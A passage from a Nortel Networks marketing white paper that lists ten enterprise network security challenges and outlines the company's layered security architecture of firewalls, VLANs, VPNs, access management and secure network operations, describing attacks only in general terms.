You are on page 1of 50

White Paper

Nortel Networks

Unified Security Architecture


for enterprise network security
A conceptual, physical, and procedural framework
for high-performance, multi-level, multi-faceted security
to protect campus networks, data centers, branch networking,
remote access, and IP telephony services.

The greater the reach and availability of the network, the greater its vulnerability
to threats from within and outside the organization.

The new openness of networked communications introduces new ethical,


financial, and regulatory pressures to protect networks and enterprises from
internal and external threats and attacks.

Every IT security professional should be up-to-date on the Top Ten challenges to


enterprise security—and the latest recommendations to address those challenges.
Contents
Executive summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Part I. The Top Ten challenges to enterprise network security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Enterprise Security Challenge #1—The Internet was designed to share, not to protect . . . . . . . . . . . . . . . . . 4
Enterprise Security Challenge #2—Security is not optional. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5
Enterprise Security Challenge #3—The bad guys have good guns. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5
Enterprise Security Challenge #4—Security threats recognize no boundaries. . . . . . . . . . . . . . . . . . . . . . . . . .6
Enterprise Security Challenge #5—Security depends on people, process, and technology. . . . . . . . . . . . . . . . .6
Enterprise Security Challenge #6—It’s not enough to guard the front gate. . . . . . . . . . . . . . . . . . . . . . . . . . . .7
Enterprise Security Challenge #7—There’s no stock blueprint. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7
Enterprise Security Challenge #8—Frisking everybody and everything takes time. . . . . . . . . . . . . . . . . . . . . .9
Enterprise Security Challenge #9—Grace under fire is a requirement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .9
Enterprise Security Challenge #10—Security is a closed-loop process with an open-ended date. . . . . . . . . . . .9
Part II. The Nortel Networks Unified Security Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.1. Multi-layer security across application and network levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12
2.2. Variable-depth security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .13
2.3. Closed-loop policy management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
2.4. Uniform access management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
2.5. Secure network operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .15
2.6. Secure multimedia communications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18
2.7. Network survivability under attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19
2.8. The closed-loop policy management reference model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19
2.9. A closer look at uniform access management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .21
Part III. Network security in the real world . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
3.1. Securing the campus network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .25
3.2. Securing the data center . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .28
3.3. Securing the remote office . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31
3.4. Securing remote access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35
3.5. Securing IP telephony services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .37
Part IV. Nortel Networks technology and expertise . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
4.1. Design tenets built into the Nortel Networks security portfolio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .42
4.2. Expanded choice through partnerships . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43
4.3. Security services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
4.4. Nortel Networks product assurance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
4.5. Nortel Networks and cross-industry security developments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46

Appendix A. Hackers’ tools of the trade . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47

Appendix B. Application and network level threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49


Executive summary
Today’s connected enterprise faces a security paradox. The very openness and ubiquity that make the
Internet such a powerful business tool also make it a tremendous liability. The Internet was designed to
share, not to protect. The ports and portals that welcome remote sites, mobile users, customers, and busi-
ness partners into the trusted internal network also potentially welcome cyber-thieves, hackers, and others
who would misappropriate network resources for personal gain.

The only effective network security strategy is one that permeates the end-to-end architecture and enforces
corporate policies on multiple levels and multiple network points.

Nortel Networks, a global leader in secure data networking, offers proven solutions to satisfy end-to-end
network security requirements. “Security in the DNA” is a key tenet of our strategy for the new enterprise
network, a convergence framework we call “One Network. A World of Choice.”

This document presents the security component of that enterprise network strategy. The “Unified Security
Architecture” provides a conceptual, physical, and procedural framework of best recommendations and
solutions for enterprise network security. It serves as an important reference guide for IT professionals
responsible for designing and implementing secure networks.

What are the requirements and vulnerabilities? What technology options and implementation choices are
available? How do you protect the network at all levels? This comprehensive strategy addresses those
pressing concerns facing IT security specialists, and offers encouraging news about the depth and breadth
of options available for securing critical network resources.

The Unified Security Architecture is realistic.


It assumes that all components of an IT infrastructure are targets... that even internal users could be
network threats... attacks are inevitable... network performance cannot be compromised by processing-
intensive security measures... and IT budgets are constrained.

The Unified Security Architecture acknowledges the diversity of networked enterprises.


It is not a one-size-fits-all prescription, but rather a framework of functionality that offers multiple
implementation choices suitable for closed, extended, and open enterprises in different industries—
and for diverse application requirements within all enterprise types.

The Unified Security Architecture addresses the multi-level complexity of network threats.
It provides answers on multiple levels—for instance, from a firewall guardian to block intruders at the
front gate to encryption to shroud every packet in privacy... from virtual private networks that span
the global Internet to virtual LANs that segregate network management traffic from desktop users.

The Unified Security Architecture promotes a process, rather than an endpoint.


Effective security is not achieved through a one-time initiative. This architecture outlines measures
for strong ongoing policy management, reflecting both human and technical factors.

Read on for a discussion of the Top Ten challenges facing IT professionals today and how the
Nortel Networks Unified Security Architecture addresses the challenges.

3
“Unified Security Architecture”
for enterprise network security
A conceptual, physical, and procedural framework for high-performance, multi-level, multi-
faceted security to protect campus networks, data centers, branch networking, remote access,
and IP telephony services.

Part I. The Top Ten challenges to enterprise network security


Every enterprise that relies on network-connected applications and services is subject to 10 key security realities:

1. The Internet was designed to share, not to protect.


2. Security is not optional.
3. The bad guys have good guns.
4. Security threats recognize no boundaries.
5. Security depends on people, process, and technology.
6. It’s not enough to guard the front gate.
7. There’s no stock blueprint.
8. Frisking everybody and everything takes time.
9. Grace under fire is a requirement.
10. Security is a closed-loop process with an open-ended date.
Let’s take a closer look at these challenges—and what IT security professionals can do about them.

Enterprise Security Challenge #1


The Internet was designed to share, not to protect.
In six or seven short years, the Internet has evolved from an adjunct contact channel into the backbone of many critical
business applications. Enterprises are leveraging their IP-based intranets and the world-wide Internet to bring remote offices,
mobile workers, and business partners into their trusted network environments. Many enterprises are capitalizing on the
growing reach and reliability of IP data networks to completely redefine the way they deliver and manage approved corporate
applications.

The Internet enables them to interact more effectively with customers, streamline operations, reduce operating costs, and
increase revenues. However, the Internet was designed to share, not to protect. The ports and portals that welcome outside
users into the trusted internal network also potentially open the door to serious threats. The level of threat only increases as
legacy applications become network-enabled and as network managers open their networks to more new users and applica-
tions.

How do you manage mission-critical communications on an inherently insecure medium? Managing that flow is somewhat
like guarding a revolving door. You can’t lock it unless you also close out the traffic you do want.

Remote access services that enable traveling employees to dial in for e-mail access... remote offices connected via dial-up lines...
intranets, and extranets that connect outside parties to the enterprise network... all these business-enabling communications
increase the vulnerability of the network.
4
Enterprise Security Challenge #2
Security is not optional.
Security breaches and unlawful access to confidential data can cost enterprises millions, but the requirement for network secu-
rity goes beyond financial incentives. The governments of many countries are forcing enterprises to comply with regulations
governing network security and privacy.

In the U.S., the Federal government regulates the privacy and security of electronic information with such regulations as the
Health Insurance Portability and Accountability Act (HIPAA), the Gramm-Leach-Bliley Act, the Safe Harbor Act, the USA
Patriot Act, and the Children’s Internet Protection Act (CIPA). More are coming.

Similar regulations are being enacted in Europe and elsewhere, such as the Data Protection Act and Computer Misuse Act in
the U.K. Failure to comply with these regulations brings civil and criminal penalties, even prison terms.

Even if governmental regulations weren’t an issue, organizations that suffer security breaches may be sued by customers and
damaged by negative publicity. All enterprises that leverage the Internet for remote access have an obligation to protect network
integrity and data confidentiality—for their own sakes as well as for their customers and business partners.

Enterprise Security Challenge #3


The bad guys have good guns.
Attackers have a broad repertoire of tools and techniques they can use to compromise a network. With these tools of the trade,
they can launch multi-level attacks to access the network—creating an access hole to intrude upon the network, and then using
secondary attacks to exploit other parts of the network.

For example, attackers can take advantage of weak user authentication and authorization tools, improper allocation of hidden
space, shared privileges among applications, or even sloppy employee habits to gain unauthorized access to network resources.

They can disable a trusted host and assume its identity, a threat known as IP spoofing or session hijacking.

Using sophisticated new network sniffers that can decode data from packets across all layers of the OSI model, hackers can
steal user names and passwords, and use that information to launch deeper attacks.

Denial of Service (DoS) attacks flood a network with illegitimate requests and thereby prevent legitimate users from accessing
their service.

In bucket brigade attacks, also known as “man-in-the-middle” assaults, the attacker intercepts messages in a public key
exchange between a server and a client, retransmits the messages substituting their public key, and in the process tricks the
original entities/users into thinking they are communicating with each other.

Back door entries to access network resources can be accidentally or intentionally opened by users and procedural oversights.

Masquerading enables a hacker to pose as a valid administrator or engineer to access the network, often to elevate user privileges.

For more information about these types of attacks, see Appendix A, “Hackers’ Tools of the Trade.”

5
Enterprise Security Challenge #4
Security threats recognize no boundaries.
The typical enterprise “internal” trusted network is anything but internal these days. It extends to include supply chain part-
ners, telecommuters, remote access users, Web users, application service providers, disaster recovery providers, and more.
Unfortunately, that means that the network also reaches hackers, cyber-thieves, disgruntled employees, and others who would
misappropriate network resources for personal gain.

In today’s business environment, the concept of a network perimeter is disappearing. Boundaries between inside and outside
networks are becoming thinner, almost irrelevant. Applications run on top of networks in a layered fashion.

The OSI (Open Systems Interconnection) model was built to allow different layers to work without knowledge of each other.
Unfortunately, that means that if one layer is hacked, communications are compromised without the other layers being aware
of the attack. That means security must address unique considerations at application and network layers—and bridge these
layers to ward off multi-level threats.

Application-layer attacks exploit vulnerabilities in the operating system and applications to gain access to resources.
Application-layer attacks can be based on viruses, worms, buffer overflow, and password harvesting, among others. Web serv-
ices and single sign-on technologies aggravate the problem, since they encourage Web-enabling legacy-based applications that
were not designed with Web connectivity and security issues in mind.

Network-layer threats expose the network infrastructure to sabotage, vandalism, bad system configuration, denial of service
(DoS), snooping, industrial espionage, and theft of service. Attacks may be launched from inside the network by insiders and
also from external sources such as hackers.

For more information about application-layer and network-layer threats, see “Appendix B: Application and network level threats.”

Enterprise Security Challenge #5


Security depends on people, process, and technology.
Vulnerabilities arise both from people and process failures (such as posting their passwords in public view, or slack policy
enforcement) and technical aspects (such as rogue programs and Trojan horses)—and combinations of all three.

The Nimda virus that recently caused havoc in IT environments is a perfect example. At first glance, Nimda was technical in
nature: a virus. But on closer inspection, the havoc was caused more by human error than technical devilry. Nimda exploited
six previous technical vulnerabilities; it was just a variant of previous vulnerabilities that were documented and communicated
many months before Nimda actually spread on the Internet.

Organizations should all have known about these vulnerabilities and disseminated that knowledge to the people responsible for
protecting IT systems. Nimda was a non-issue for enterprises that had established processes in place for translating knowledge
into action tasks, assigning responsibility for those tasks, and auditing successful completion.

6
Enterprise Security Challenge #6
It’s not enough to guard the front gate.
Every component of the IT infrastructure is susceptible to attacks, not just obvious gateways to the Internet. Hosts, applications
such as IP telephony, routers, and switches can be attacked by hackers or unauthorized users from inside or outside the enterprise.
At the network level, the use of firewalls, proxy servers, and user-to-session filtering can add protection, but hackers seem to get
smarter all the time. Using user access control at the network and application level with appropriate authentication and authoriza-
tion can minimize the risks of unauthorized access.

But the sheer diversity of the types of attacks—and the multi-level nature of many attacks—requires that IT managers understand
how security breaches are instigated and be able to assess and recover from any inflicted damage. That means the only effective
network security strategy is one that permeates the end-to-end architecture and enforces corporate policies on multiple levels—user,
application, and network—and at multiple network points.

Enterprise Security Challenge #7


There’s no stock blueprint.
Each enterprise has a unique set of business needs and has evolved their networking environment accordingly. That means the
“right” security strategy is more a prescription of functionality and characteristics than a stock blueprint. Security is not a ‘one size
fits all’ situation. Neither is it a static implementation, any more than the network or technology remains static.

For general purposes, we can categorize enterprises into three types of security spheres:

The “closed enterprise” uses logical (e.g. frame relay) or physical private lines between sites, with PC dial access provided selec-
tively for employees needing access into the Internet. Web presence is achieved through an Internet data center provided by a
service provider (who is responsible for establishing a secure environment). The organization also provides conventional dial access
for remote employees (e.g. working from a hotel). The company uses private e-mail among employees with no external access.
Wireless LANs are also starting to be used.

Even the closed enterprise has security concerns, not just from disgruntled internal users, but also because there are a number of
‘backdoor’ exposures. Users with dial access to the Internet from their desktop PCs, employees surfing the ‘Net from laptops they
use at home or on the road, and wireless LANs all introduce Internet-related threats. Perhaps, the greatest risk comes from the
specious belief that the closed enterprise is immune to external risks.

The “extended enterprise” is an extension of the ‘closed’ enterprise. Web presence is still achieved via a service provider. Support
for remote employee and office access over IP virtual private networks (VPNs) over the Internet is provided, delivering higher
speed, lower cost connectivity. The enterprise provides general-purpose access for all employees into the Internet, allowing them to
leverage the abundance of business-related information available on the Internet. Inter-working between the internal e-mail system
and the rest of world is provided.

The “open enterprise” leverages the Internet by allowing partners, suppliers, and customers to have access to an enterprise-
managed Internet Data Center, even allowing selective access to internal databases and applications (e.g. as part of a supply chain
management system). Internal and external users access the enterprise network from home, remote offices, or other networks using
wired or mobile devices.

7
For the extended enterprise, the diversity of supported services and access mechanisms translates into multiple paths into the
enterprise network, and in turn increases the risk. Naturally, that risk increases exponentially with the open enterprise, which
has the greatest susceptibility to application-layer and network-layer threats, unauthorized access, and eavesdropping.
Infrastructure, applications, and network management systems are equally vulnerable.

Figure 1. Generic Enterprise types

Closed enterprise

ASP Data Center


Customers Employees • Dedicated WAN
• PC dial-in access
• PC Internet dial-out
• Outsourced Web site
Internet Enterprise
network • Private e-mail

Extended enterprise

Employees Employees
• Internet Data Center
• Remote access and office IP-VPNs
• Employee Internet access

Internet Enterprise • Interworked e-mail


network

Open enterprise
Customers/partners/ Customers/
employees Employees
• Controlled partner and select
customer access

• Connectivity boundaries lowered


Enterprise
Internet network

8
Enterprise Security Challenge #8
Frisking everybody and everything takes time.
Anyone who has traveled by airplane knows that the trade-off for enhanced security is delay. The more closely you inspect bags
and travelers, the longer the lines at security.

On enterprise networks as well, turning up the full complement of security features can slow Web servers to a crawl as they bog
down with processing-intensive encryption, decryption, key management, and more. Bolting IP-VPN capabilities onto legacy
routers brings its own brand of performance penalty. Voice applications, such as live Webcasts and Voice over IP, are very sensi-
tive to delay and jitter and are therefore dramatically affected by traditional security mechanisms.

Enterprise Security Challenge #9


Grace under fire is a requirement.
In the context of security, “reliability” and “survivability” have somewhat different meanings. Network reliability ensures that
the network continues to operate in spite of incidental failure of software and/or hardware components. Network survivability
means the network continues to operate—delivering essential services in a timely manner—while battling security threats, even
if parts of the network are unreachable or disabled due to overt attack.

Enterprise Security Challenge #10


Security is a closed-loop process with an open-ended date.
Organizations must view security as a steady process and evolving way of thinking about how to protect systems, networks,
applications, and resources. Reduce risk by continually and steadily making progress in identifying and addressing vulnerabili-
ties and security policy holes. Corporations and government institutions must be able to determine what is at stake when secu-
rity measures fail, how to detect security breaches, and what to do about them.

This process also entails continual training and awareness, since breaches of security policy are usually caused by human error
or carelessness. Employees, managers, and administrators must all be aware of established security policies and best practices.

The good news is that enterprise networks can minimize their risks from unauthorized users without sacrificing performance
for legitimate users. Part II of this document shows how the Nortel Networks Unified Security Architecture addresses these
Top Ten challenges.

Figure 2. Enterprises need a security framework to optimally use IT techniques, tools, and methodologies against attackers

Possible attacks Protected enterprise


• Anti-virus software
• Authorization threats • Deep packet filtering
• IP spoofing • Digital certificate
• IPsec and SSL encryption
• Network sniffers
• Firewalls
• Denial of service
• Intrusion
• Bucket brigade Enterprise
network
• Attacks
• Back door traps
• Data modification
• Network and host-based
• Masquerading
Intrusion Detection Systems (IDS)
• Infrastructure
• Network sniffers

9
Part II. The Nortel Networks
Unified Security Architecture
What can security IT professionals do about the Top Ten challenges?
The Nortel Networks Unified Security Architecture defines a conceptual, physical, and procedural framework of best recom-
mendations for end-to-end enterprise network security—addressing all the Top Ten challenges:
• The Internet was designed to share, not to protect.
So the Unified Security Architecture defines virtual private networks, virtual LANs, firewalls, encryption, and other
mechanisms that enable enterprises to reduce the risk of being Internet-connected.
• Security is not optional.
The Unified Security Architecture upgrades enterprise security programs and infrastructures to comply with business,
ethical, and regulatory mandates to protect data integrity and confidentiality.
• The bad guys have good guns.
The Unified Security Architecture identifies the various tools of the trade, how they operate, and what kinds of protec-
tions thwart these attacks.
• Security threats recognize no boundaries.
The Unified Security Architecture addresses threats on multiple functional and architectural layers, enabling enterprises
to flexibly define what needs to be protected, from what kinds of threats, implemented how, and at what layers.
• Security depends on people, process, and technology.
The Unified Security Architecture calls for developing and enforcing security policies that address technical considera-
tions and human aspects of security, such as staff training and process.
• It’s not enough to guard the front gate.
The Unified Security Architecture begins with perimeter firewall defense and documents security provisions all the way
to the individual user and application.
• There’s no stock blueprint.
The Unified Security Architecture defines the required functionality and offers enterprises broad choice in which func-
tions to implement, to what degree, using what platforms and protocols.
• Frisking everybody and everything takes time.
The Unified Security Architecture introduces purpose-built security products that use load-balancing, health-checking,
and innovative acceleration technologies to minimize latency.
• Grace under fire is a requirement.
The Unified Security Architecture defines ways to segregate critical resources and sustain performance even under attack.
• Security is a closed-loop process with an open-ended date.
The Unified Security Architecture calls for policy management to be a process of continuous feedback and improve-
ment, reflecting the latest industry knowledge and best practices.

10
The comprehensive security strategy set forth in this document is based on seven key principles:
1. Multi-layer security that defines security protection functions at application, network-assisted, and network security
levels—in a layered architecture that can be flexibly defined and implemented.
2. Variable-depth security across the enterprise—not just at the edge of the Internet—for example, from firewall
perimeter defense, to VPNs to protect Internet-traversing traffic, and to VLANs to segregate traffic within a network.
3. Closed-loop policy management, including configuration of edge devices, enforcement of policies in the network,
and verification of network functionality as seen by the end user application.
4. Uniform access management, including stringent authentication and roles-based authorization of access to all
resources for all users, with granular access policies defined at the application level and managed enterprise-wide.
5. Secure network operations, by physically or logically partitioning network management from user traffic, and
applying other recommended security mechanisms to operational activities.
6. Secure multimedia communications, protected by encrypting the data, voice, and video payload without introducing
delays that this real-time traffic cannot tolerate.
7. Survival under attack, for instance, by using resilient architectures with no single point of failure, and applying
intrusion-detection systems, anti-virus software, content filtering, and ongoing vigilance as attackers continue adopting
new weaponry.

Figure 3. Principles behind Nortel Networks Unified Security Architecture


e

ni r
U

fie
ec tu
d Se
c u r i ty A r c h i t
Layered security Securing network operations

Variable-depth security Securing multimedia


communications

Closed-loop policy management


Survivability under attack

Uniform access management

11
The principles underpinning the Unified Security Architecture offer enterprises a security blueprint to use as they move
towards increasingly open environments. Let’s take a look at each of the seven key principles of the Unified Security
Architecture.

2.1. Multi-layer security across application and network levels

Recognizing the multi-layered, interdependent nature of enterprise networks—and the critical need for security at more than
the application level—the Nortel Networks Unified Security Architecture logically organizes security into multiple levels:

• The Network Security Layer provides security functions at OSI layers 1 to 3 (physical, link, and data levels).
• The Network-Assisted Security Layer provides security functions at OSI layers 4 to 7 (network to application/
presentation layers) on top of the network level for added security.
• The Application Security Layer provides security in layer 7 of the OSI model, the application layer, and includes all
security built into server and storage platforms.
Some functions, such as access lists and VLANs, operate purely at the Network Security Level. Others, such as firewalls,
operate at either the Network or Network-Assisted Security Levels, depending on whether they are stateful or not. Others such
as SSL (Secure Sockets Layer) can be viewed as network-assisted or application security. The power of the Unified Security
Architecture is that industry-defined security functions are leveraged in a structured fashion, tightening security overall.

See Part III, “Security in the Real World,” for examples of these security layers in action for protecting campus and branch
networks, data centers, IP telephony services, and remote access.

Hardening server operating systems


Within the application level of the multi-layer security framework, a key element is “hardening” the multiple
operating systems used in network and user applications, such as OSs for data communications devices, servers,
network management systems, IP telephony servers, and more.

In an increasingly open, multivendor IT environment, network elements are frequently based on commercially avail-
able OSs. For example, Nortel Networks CallPilot unified messaging system, Symposium Contact Centers, and
Business Communications Manager use a hardened version of Windows NT with off-the-shelf security software for
functions such as anti-virus protection, intrusion-detection, and login audits. Nortel Networks Succession CSE 1000
and Meridian IP-enabled PBX portfolios are built on an embedded real-time OS called VxWorks. The Nortel
Networks Succession CSE MX system is built on UNIX.

Procedures for hardening the OSs in Nortel Networks products are provided in our documentation. For third-party
operating systems where no specific hardening guide exists, consult the OS vendor for the latest OS hardening patches
and procedures.

Figure 4. Unified Security Architecture

Policy Management
Network Mgmt.

Application Security • End users


Access Mgmt.

• Operators
Security

Secure

• Partners
Network-Assisted Security • Customers

Network Security

12
The remaining elements of the architecture—discussed in the sections to follow—are inter-related and somewhat orthogonal to
these layers. The table below illustrates how common security technologies map to the elements of Nortel Networks Unified
Security Architecture.

Figure 5. Security functionality mapping to the Unified Security Architecture

Security functionality Network Network-assisted Application Policy management functionality


Security Security Security

L2 Layer 2 VPN, EAP, and port security Yes • Policy Repository


• Policy Decision Point
NAT Network Address Translation Yes • Policy Enforcement Point

AL Access control List Yes


Secure access management functionality
IPsec IPsec encryption Yes
• Authentication client Auth
SRT Secure dynamic routing Yes • Authentication server
• Authentication database
FW Firewalling Yes Yes

IDS Intrusion detection Yes Yes Network management security


functionality

SSL SSL encryption Yes Yes • Secure activity logs


• Network operator authentication
CF Content filtering Yes Yes • Access control/operator authorization
• Encryption
VS Virus scanning Yes Yes • Secure remote access
• Firewalls
• Intrusion detection
• OS hardening
• Virus free software

2.2. Variable-depth security

Defining security policy at multiple network levels produces a security strategy where each security level builds upon the
capabilities of the layer below and provides finer grained security the closer you get to resources.

VLANs (Virtual LANs) provide basic network compartmentalization and segmentation, enabling business functions to
be segregated in their own private local area networks, with cross-traffic from other VLAN segments strictly controlled
or prohibited. The use of VLAN “tags” enables the segregation of traffic into specific groups such as Finance, HR, and
Engineering, separating their data without leakage between disparate functions.

Perimeter and distributed firewall-filtering capabilities provide another level of protection at strategic points within the
network. Firewalls enable the network to be further segmented into smaller areas, and enable secure connections to the public
network. Firewalls limit access to inbound and outbound traffic to the protocols and authentication methods that are explicitly
configured in the firewall. Firewalls that support Network Address Translation (NAT) enable optimization of IP addressing
within the network as specified in RFC 1918 (Address Allocation for Private Internets).

Firewalls provide an extra layer of access control that can be customized based on business needs. Distributed firewalls add the
benefit of scalability. Personal firewalls can be deployed on end-users’ systems to protect application integrity.

13
Virtual private networks (VPNs) provide an even finer granularity of user access control and personalization—enabling
secure access at the individual user level from remote sites and business partners, without requiring dedicated pipes.

Dynamic routing over secure tunnels across the Internet provides a highly secure, reliable and scalable solution. VPNs, VLANs,
and firewalls together allow the network administrator to limit access by a user or user group based on strictly defined policy
criteria and business needs. VPNs provide strong assurance of data integrity and confidentiality with strong encryption.

VLANs alone may satisfy the security needs of the “closed” enterprise. “Extended” and “open” enterprises will likely require a
combination of security level capabilities.

2.3. Closed-loop policy management

A properly designed and implemented security policy is an absolute requirement for all types of enterprises and has to be
owned by one group. It should be a living document and process, which is enforced, implemented, and updated to reflect the
latest changes in the enterprise infrastructure and service requirements.

The security policy must clearly identify the resources in the enterprise that are at risk and resulting threat mitigation method-
ologies. It should define which users or classes of users have access to which resources. The policy must define the use of audit
trails to help identify and discover violations and the appropriate responses.

Users think of the network in terms of people, applications, locations, time of day, etc.—not in technical terms such as
“firewall stateful inspection” or “access lists.” Security policies should use non-technical vocabulary to the extent possible for
user-facing issues, automatically translated by the policy management system into technical security mechanisms for network
implementation.

Policy management addresses the full realm of security components—firewalls, intrusion-detection systems, access lists and
filters, authentication techniques, and more—along with a system-wide view of network environments, such as data center,
remote office, and campus networks.

Ultimately, policy operates at a granular level to address pieces of the solution while providing centralized control and account-
ability. Centralization ensures that security parameters are set consistently across multiple nodes, and that multiple policies for
different administrative domains all reflect enterprise-wide policy and inter-domain consistency.

Closed-loop policy management is implemented using the reference architecture described in 2.8, and includes configuration
management of network devices, enforcement of policies in the network, and verification of network functionality via audit
trails. Verification and audit trails close the loop on policy management, and result in updates to the policy to reflect corrective
actions.

2.4. Uniform access management

Access management refers to authentication and authorization services that control user’s access to resources. During authenti-
cation, users identify themselves to the network; during authorization, the network determines users’ level of privileges based
on their identity, as defined in policy.

Access management is controlled by multiple methods, such as IP source filtering, proxies, and credential-based methods—
often used in combination, and each with its advantages and limitations. For example, an enterprise may choose to manage
access for workstations using IP source filtering, and may choose to use a credential-based scheme for other users.

Since users could be employees, network technicians, supply chain partners, inter-organization team members, or even
customers, it is important to have robust, centralized access control enforced by the local or remote network device interfacing
to the user.

14
Several methods can be used to authenticate a user, such as: permanent or one-time passwords, biometric techniques, smart
cards, and certificates. Password-based authentication must use strong passwords that are at least eight characters in length with
at least one alphabetic, one numeric, and one special character.

Where stronger authentication is required, password authentication can be combined with another authentication and authori-
zation process based on protocols such as RADIUS and LDAP to provide authentication, authorization, and accounting (AAA)
services. Additionally, key management can be based on Internet Key Exchange (IKE), certificate management on Public Key
Infrastructure X.509 (PKIX), Certificate Management Protocol (CMP), Online Certificate Status Protocol (OCSP), and
Simple Certificate Validation Protocol (SCVP).

In defining access privileges on all ports and devices, the concept of “least privilege” should be applied, granting access only as
needed.

“Open” and “extended” enterprises face the greatest challenges when designing access management policy. They require fine-
grained rules that properly interface with identity directories and databases, multiple authentication systems such as RADIUS,
and various hosts, applications, and application servers.

The system should perform session management per user after the user is authenticated—and use flexible configuration and
policy enforcement with fine-grained rules, capable of dealing with specific objects. Unique accounts for each administrator
should be used, with accountability for actions traceable to individuals, to provide for appropriate monitoring, accounting, and
secure audit trails.

For more information about authentication and authorization, see section 2.9, “A closer look at uniform access management.”

2.5. Secure network operations

On the one hand, network management is like other data applications, running on servers and workstations, complemented by
application-level security and taking advantage of network-level and network-assisted security. On the other hand, network
operators are specialized users who should be subject to more stringent authentication and authorization procedures.

Because of the greater access authority and functional privilege granted to network management personnel, their access and
activities must be carefully secured to protect network configuration, performance, and survivability. The more open the enter-
prise and the more centralized the network management system, the greater the requirement for stringent security for network
management processes.

Secure network management requires a holistic approach, rather than a specific security feature set on a network element.
Our Unified Security Architecture recommendations address nine critical areas:
• Secure activity logs
• Network operator authentication
• Authorization for network operators
• Encryption of network management traffic
• Secure remote access for operators
• Firewalls and VLANs to partition the network
• intrusion-detection
• Hardening operating systems
• Anti-virus protection

15
Secure activity logs provide a verifiable audit trail of user or administrator activities and events generated by network devices.
Security activity logs must contain sufficient information to establish individual accountability, reconstruct past events, detect
intrusion attempts, and perform after-the-fact analysis of security incidents and long-term trend analysis. Activity log informa-
tion helps identify the root cause of a security problem and prevent future incidents. For instance, activity logs can be used to
reconstruct the sequence of events that led up to a problem, such as an intruder gaining unauthorized access to system
resources, or a system malfunction caused by an incorrect configuration or a faulty implementation. Syslog is the most
common mechanism used by equipment vendors; Syslog works with all third-party log analyzer systems. Because the informa-
tion contained in activity logs can be used to compromise a network, this log information itself must be secured.

Network operator authentication based on strong centralized administration and enforcement of passwords ensures that only
authenticated operators gain access to management systems. Centralized administration of passwords enables enforcement of
password strength and removes the need for local storage of passwords on the network elements and EMS (Element
Management Systems). RADIUS is the basic mechanism of choice for automating centralized authentication within Nortel
Networks products.

Authorization for network operators uses authenticated identity to determine the user’s access privileges—what systems they
can access, what functions they can perform. Techniques based on RADIUS servers provide a basic level of access control. An
additional LDAP server can provide more fine-grained access control if necessary.

Encryption of network management traffic protects the confidentiality and integrity of network management data traffic—
especially important with the growing use of in-band network management. Encryption provides a high degree of protection
from internal and external threats, with the exception of the small group of insiders that have legitimate access to encryption
keys.

Encryption between network operations center (NOC) clients and Element Management System (EMS) servers and/or
Network Elements should be provided. This includes SNMP traffic, because there are known vulnerabilities with SNMP v1
and v2, which are intended to be addressed by SNMP v3. Given the widespread deployment of SNMP v1 and v2, IPsec
can be used to secure this traffic.

Depending on traffic type, the security protocols to use for these links are IPsec (IP Security), Secure Shell (SSH), and SSL:

• SSH is an application-level security protocol that can be used in place of IPsec if the traffic consists of Telnet and FTP
only, but it cannot normally be used to protect other traffic types.
• IPsec protocol runs between the network layer (Layer 3) and the transport layer (Layers 4) and is the preferred protocol
to protect any type of data traffic, independent of applications and protocols. External IPsec VPN devices, such as
Nortel Networks Contivity Secure IP Services Gateways, can be used in various parts of the network to secure
management traffic.

• SSL technology—integrated into all standard Web browsers—is the de-facto standard security protocol to protect
HTTP traffic.

Secure remote access for operators: Security must be provided for operators and administrators who manage the network
from a remote location over a public network. Providing a secure virtual private network using IPsec is the mandatory solution,
as this will provide strong encryption and authentication of all remote operators. An IP-VPN product such as Nortel Networks
Contivity Secure IP Services Gateway should be placed at the management system interface and all operators should be
equipped with extranet access clients for their laptop or workstations.

16
